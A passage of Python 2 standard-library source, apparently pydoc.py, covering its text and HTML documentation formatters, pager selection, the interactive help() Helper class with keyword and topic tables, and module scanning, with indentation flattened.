getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = split(plain(text), '\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = os.environ.get('LINES', 25) - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
else:
object = __builtin__
for part in parts[n:]:
try:
object = getattr(object, part)
except AttributeError:
return None
return object
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
return thing, getattr(thing, '__name__', None)
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Render text documentation, given an object or a path to an object."""
object, name = resolve(thing, forceload)
desc = describe(object)
module = inspect.getmodule(object)
if name and '.' in name:
desc += ' in ' + name[:name.rfind('.')]
elif module and module is not object:
desc += ' in module ' + module.__name__
if type(object) is _OLD_INSTANCE_TYPE:
# If the passed object is an instance of an old-style class,
# document its available methods instead of its value.
object = object.__class__
elif not (inspect.ismodule(object) or
inspect.isclass(object) or
inspect.isroutine(object) or
inspect.isgetsetdescriptor(object) or
inspect.ismemberdescriptor(object) or
isinstance(object, property)):
# If the passed object is a piece of data or an instance,
# document its available methods instead of its value.
object = type(object)
desc += ' object'
return title % desc + '\n\n' + text.document(object, name)
def doc(thing, title='Python Library Documentation: %s', forceload=0):
"""Display text documentation, given an object or a path to an object."""
try:
pager(render_doc(thing, title, forceload))
except (ImportError, ErrorDuringImport), value:
print value
def writedoc(thing, forceload=0):
"""Write HTML documentation to a file in the current directory."""
try:
object, name = resolve(thing, forceload)
page = html.page(describe(object), html.document(object, name))
file = open(name + '.html', 'w')
file.write(page)
file.close()
print 'wrote', name + '.html'
except (ImportError, ErrorDuringImport), value:
print value
def writedocs(dir, pkgpath='', done=None):
"""Write out HTML documentation for all modules in a directory tree."""
if done is None: done = {}
for importer, modname, ispkg in pkgutil.walk_packages([dir], pkgpath):
writedoc(modname)
return
class Helper:
# These dictionaries map a topic name to either an alias, or a tuple
# (label, seealso-items). The "label" is the label of the corresponding
# section in the .rst file under Doc/ and an index into the dictionary
# in pydoc_data/topics.py.
#
# CAUTION: if you change one of these dictionaries, be sure to adapt the
# list of needed labels in Doc/tools/sphinxext/pyspecific.py and
# regenerate the pydoc_data/topics.py file by running
# make pydoc-topics
# in Doc/ and copying the output file into the Lib/ directory.
keywords = {
'and': 'BOOLEAN',
'as': 'with',
'assert': ('assert', ''),
'break': ('break', 'while for'),
'class': ('class', 'CLASSES SPECIALMETHODS'),
'continue': ('continue', 'while for'),
'def': ('function', ''),
'del': ('del', 'BASICMETHODS'),
'elif': 'if',
'else': ('else', 'while for'),
'except': 'try',
'exec': ('exec', ''),
'finally': 'try',
'for': ('for', 'break continue while'),
'from': 'import',
'global': ('global', 'NAMESPACES'),
'if': ('if', 'TRUTHVALUE'),
'import': ('import', 'MODULES'),
'in': ('in', 'SEQUENCEMETHODS2'),
'is': 'COMPARISON',
'lambda': ('lambda', 'FUNCTIONS'),
'not': 'BOOLEAN',
'or': 'BOOLEAN',
'pass': ('pass', ''),
'print': ('print', ''),
'raise': ('raise', 'EXCEPTIONS'),
'return': ('return', 'FUNCTIONS'),
'try': ('try', 'EXCEPTIONS'),
'while': ('while', 'break continue if TRUTHVALUE'),
'with': ('with', 'CONTEXTMANAGERS EXCEPTIONS yield'),
'yield': ('yield', ''),
}
# Either add symbols to this dictionary or to the symbols dictionary
# directly: Whichever is easier. They are merged later.
_symbols_inverse = {
'STRINGS' : ("'", "'''", "r'", "u'", '"""', '"', 'r"', 'u"'),
'OPERATORS' : ('+', '-', '*', '**', '/', '//', '%', '<<', '>>', '&',
'|', '^', '~', '<', '>', '<=', '>=', '==', '!=', '<>'),
'COMPARISON' : ('<', '>', '<=', '>=', '==', '!=', '<>'),
'UNARY' : ('-', '~'),
'AUGMENTEDASSIGNMENT' : ('+=', '-=', '*=', '/=', '%=', '&=', '|=',
'^=', '<<=', '>>=', '**=', '//='),
'BITWISE' : ('<<', '>>', '&', '|', '^', '~'),
'COMPLEX' : ('j', 'J')
}
symbols = {
'%': 'OPERATORS FORMATTING',
'**': 'POWER',
',': 'TUPLES LISTS FUNCTIONS',
'.': 'ATTRIBUTES FLOAT MODULES OBJECTS',
'...': 'ELLIPSIS',
':': 'SLICINGS DICTIONARYLITERALS',
'@': 'def class',
'\\': 'STRINGS',
'_': 'PRIVATENAMES',
'__': 'PRIVATENAMES SPECIALMETHODS',
'`': 'BACKQUOTES',
'(': 'TUPLES FUNCTIONS CALLS',
')': 'TUPLES FUNCTIONS CALLS',
'[': 'LISTS SUBSCRIPTS SLICINGS',
']': 'LISTS SUBSCRIPTS SLICINGS'
}
for topic, symbols_ in _symbols_inverse.iteritems():
for symbol in symbols_:
topics = symbols.get(symbol, topic)
if topic not in topics:
topics = topics + ' ' + topic
symbols[symbol] = topics
topics = {
'TYPES': ('types', 'STRINGS UNICODE NUMBERS SEQUENCES MAPPINGS '
'FUNCTIONS CLASSES MODULES FILES inspect'),
'STRINGS': ('strings', 'str UNICODE SEQUENCES STRINGMETHODS FORMATTING '
'TYPES'),
'STRINGMETHODS': ('string-methods', 'STRINGS FORMATTING'),
'FORMATTING': ('formatstrings', 'OPERATORS'),
'UNICODE': ('strings', 'encodings unicode SEQUENCES STRINGMETHODS '
'FORMATTING TYPES'),
'NUMBERS': ('numbers', 'INTEGER FLOAT COMPLEX TYPES'),
'INTEGER': ('integers', 'int range'),
'FLOAT': ('floating', 'float math'),
'COMPLEX': ('imaginary', 'complex cmath'),
'SEQUENCES': ('typesseq', 'STRINGMETHODS FORMATTING xrange LISTS'),
'MAPPINGS': 'DICTIONARIES',
'FUNCTIONS': ('typesfunctions', 'def TYPES'),
'METHODS': ('typesmethods', 'class def CLASSES TYPES'),
'CODEOBJECTS': ('bltin-code-objects', 'compile FUNCTIONS TYPES'),
'TYPEOBJECTS': ('bltin-type-objects', 'types TYPES'),
'FRAMEOBJECTS': 'TYPES',
'TRACEBACKS': 'TYPES',
'NONE': ('bltin-null-object', ''),
'ELLIPSIS': ('bltin-ellipsis-object', 'SLICINGS'),
'FILES': ('bltin-file-objects', ''),
'SPECIALATTRIBUTES': ('specialattrs', ''),
'CLASSES': ('types', 'class SPECIALMETHODS PRIVATENAMES'),
'MODULES': ('typesmodules', 'import'),
'PACKAGES': 'import',
'EXPRESSIONS': ('operator-summary', 'lambda or and not in is BOOLEAN '
'COMPARISON BITWISE SHIFTING BINARY FORMATTING POWER '
'UNARY ATTRIBUTES SUBSCRIPTS SLICINGS CALLS TUPLES '
'LISTS DICTIONARIES BACKQUOTES'),
'OPERATORS': 'EXPRESSIONS',
'PRECEDENCE': 'EXPRESSIONS',
'OBJECTS': ('objects', 'TYPES'),
'SPECIALMETHODS': ('specialnames', 'BASICMETHODS ATTRIBUTEMETHODS '
'CALLABLEMETHODS SEQUENCEMETHODS1 MAPPINGMETHODS '
'SEQUENCEMETHODS2 NUMBERMETHODS CLASSES'),
'BASICMETHODS': ('customization', 'cmp hash repr str SPECIALMETHODS'),
'ATTRIBUTEMETHODS': ('attribute-access', 'ATTRIBUTES SPECIALMETHODS'),
'CALLABLEMETHODS': ('callable-types', 'CALLS SPECIALMETHODS'),
'SEQUENCEMETHODS1': ('sequence-types', 'SEQUENCES SEQUENCEMETHODS2 '
'SPECIALMETHODS'),
'SEQUENCEMETHODS2': ('sequence-methods', 'SEQUENCES SEQUENCEMETHODS1 '
'SPECIALMETHODS'),
'MAPPINGMETHODS': ('sequence-types', 'MAPPINGS SPECIALMETHODS'),
'NUMBERMETHODS': ('numeric-types', 'NUMBERS AUGMENTEDASSIGNMENT '
'SPECIALMETHODS'),
'EXECUTION': ('execmodel', 'NAMESPACES DYNAMICFEATURES EXCEPTIONS'),
'NAMESPACES': ('naming', 'global ASSIGNMENT DELETION DYNAMICFEATURES'),
'DYNAMICFEATURES': ('dynamic-features', ''),
'SCOPING': 'NAMESPACES',
'FRAMES': 'NAMESPACES',
'EXCEPTIONS': ('exceptions', 'try except finally raise'),
'COERCIONS': ('coercion-rules','CONVERSIONS'),
'CONVERSIONS': ('conversions', 'COERCIONS'),
'IDENTIFIERS': ('identifiers', 'keywords SPECIALIDENTIFIERS'),
'SPECIALIDENTIFIERS': ('id-classes', ''),
'PRIVATENAMES': ('atom-identifiers', ''),
'LITERALS': ('atom-literals', 'STRINGS BACKQUOTES NUMBERS '
'TUPLELITERALS LISTLITERALS DICTIONARYLITERALS'),
'TUPLES': 'SEQUENCES',
'TUPLELITERALS': ('exprlists', 'TUPLES LITERALS'),
'LISTS': ('typesseq-mutable', 'LISTLITERALS'),
'LISTLITERALS': ('lists', 'LISTS LITERALS'),
'DICTIONARIES': ('typesmapping', 'DICTIONARYLITERALS'),
'DICTIONARYLITERALS': ('dict', 'DICTIONARIES LITERALS'),
'BACKQUOTES': ('string-conversions', 'repr str STRINGS LITERALS'),
'ATTRIBUTES': ('attribute-references', 'getattr hasattr setattr '
'ATTRIBUTEMETHODS'),
'SUBSCRIPTS': ('subscriptions', 'SEQUENCEMETHODS1'),
'SLICINGS': ('slicings', 'SEQUENCEMETHODS2'),
'CALLS': ('calls', 'EXPRESSIONS'),
'POWER': ('power', 'EXPRESSIONS'),
'UNARY': ('unary', 'EXPRESSIONS'),
'BINARY': ('binary', 'EXPRESSIONS'),
'SHIFTING': ('shifting', 'EXPRESSIONS'),
'BITWISE': ('bitwise', 'EXPRESSIONS'),
'COMPARISON': ('comparisons', 'EXPRESSIONS BASICMETHODS'),
'BOOLEAN': ('booleans', 'EXPRESSIONS TRUTHVALUE'),
'ASSERTION': 'assert',
'ASSIGNMENT': ('assignment', 'AUGMENTEDASSIGNMENT'),
'AUGMENTEDASSIGNMENT': ('augassign', 'NUMBERMETHODS'),
'DELETION': 'del',
'PRINTING': 'print',
'RETURNING': 'return',
'IMPORTING': 'import',
'CONDITIONAL': 'if',
'LOOPING': ('compound', 'for while break continue'),
'TRUTHVALUE': ('truth', 'if while and or not BASICMETHODS'),
'DEBUGGING': ('debugger', 'pdb'),
'CONTEXTMANAGERS': ('context-managers', 'with'),
}
def __init__(self, input=None, output=None):
self._input = input
self._output = output
input = property(lambda self: self._input or sys.stdin)
output = property(lambda self: self._output or sys.stdout)
def __repr__(self):
if inspect.stack()[1][3] == '?':
self()
return ''
return '<pydoc.Helper instance>'
_GoInteractive = object()
def __call__(self, request=_GoInteractive):
if request is not self._GoInteractive:
self.help(request)
else:
self.intro()
self.interact()
self.output.write('''
You are now leaving help and returning to the Python interpreter.
If you want to ask for help on a particular object directly from the
interpreter, you can type "help(object)". Executing "help('string')"
has the same effect as typing a particular string at the help> prompt.
''')
def interact(self):
self.output.write('\n')
while True:
try:
request = self.getline('help> ')
if not request: break
except (KeyboardInterrupt, EOFError):
break
request = strip(replace(request, '"', '', "'", ''))
if lower(request) in ('q', 'quit'): break
self.help(request)
def getline(self, prompt):
"""Read one line, using raw_input when available."""
if self.input is sys.stdin:
return raw_input(prompt)
else:
self.output.write(prompt)
self.output.flush()
return self.input.readline()
def help(self, request):
if type(request) is type(''):
request = request.strip()
if request == 'help': self.intro()
elif request == 'keywords': self.listkeywords()
elif request == 'symbols': self.listsymbols()
elif request == 'topics': self.listtopics()
elif request == 'modules': self.listmodules()
elif request[:8] == 'modules ':
self.listmodules(split(request)[1])
elif request in self.symbols: self.showsymbol(request)
elif request in self.keywords: self.showtopic(request)
elif request in self.topics: self.showtopic(request)
elif request: doc(request, 'Help on %s:')
elif isinstance(request, Helper): self()
else: doc(request, 'Help on %s:')
self.output.write('\n')
def intro(self):
self.output.write('''
Welcome to Python %s! This is the online help utility.
If this is your first time using Python, you should definitely check out
the tutorial on the Internet at http://docs.python.org/tutorial/.
Enter the name of any module, keyword, or topic to get help on writing
Python programs and using Python modules. To quit this help utility and
return to the interpreter, just type "quit".
To get a list of available modules, keywords, or topics, type "modules",
"keywords", or "topics". Each module also comes with a one-line summary
of what it does; to list the modules whose summaries contain a given word
such as "spam", type "modules spam".
''' % sys.version[:3])
def list(self, items, columns=4, width=80):
items = items[:]
items.sort()
colw = width / columns
rows = (len(items) + columns - 1) / columns
for row in range(rows):
for col in range(columns):
i = col * rows + row
if i < len(items):
self.output.write(items[i])
if col < columns - 1:
self.output.write(' ' + ' ' * (colw-1 - len(items[i])))
self.output.write('\n')
def listkeywords(self):
self.output.write('''
Here is a list of the Python keywords. Enter any keyword to get more help.
''')
self.list(self.keywords.keys())
def listsymbols(self):
self.output.write('''
Here is a list of the punctuation symbols which Python assigns special meaning
to. Enter any symbol to get more help.
''')
self.list(self.symbols.keys())
def listtopics(self):
self.output.write('''
Here is a list of available topics. Enter any topic name to get more help.
''')
self.list(self.topics.keys())
def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(strip(doc) + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import StringIO, formatter
buffer = StringIO.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + join(split(xrefs), ', ') + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if find(modname, '.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = lower(key)
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
desc = split(__import__(modname).__doc__ or '', '\n')[0]
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
if key is None:
callback(None, modname, '')
else:
loader = importer.find_module(modname)
if hasattr(loader,'get_source'):
import StringIO
desc = source_synopsis(
StringIO.StringIO(loader.get_source(modname))
) or ''
if hasattr(loader,'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
module = loader.load_module(modname)
desc = (module.__doc__ or '').splitlines()[0]
path = getattr(module,'__file__',None)
if find(lower(modname + ' - ' + desc), key) >= 0:
callback(path, modname, desc)
if completer:
completer()
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print modname, desc and '- ' + desc
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
# --------------------------------------------------- web browser interface
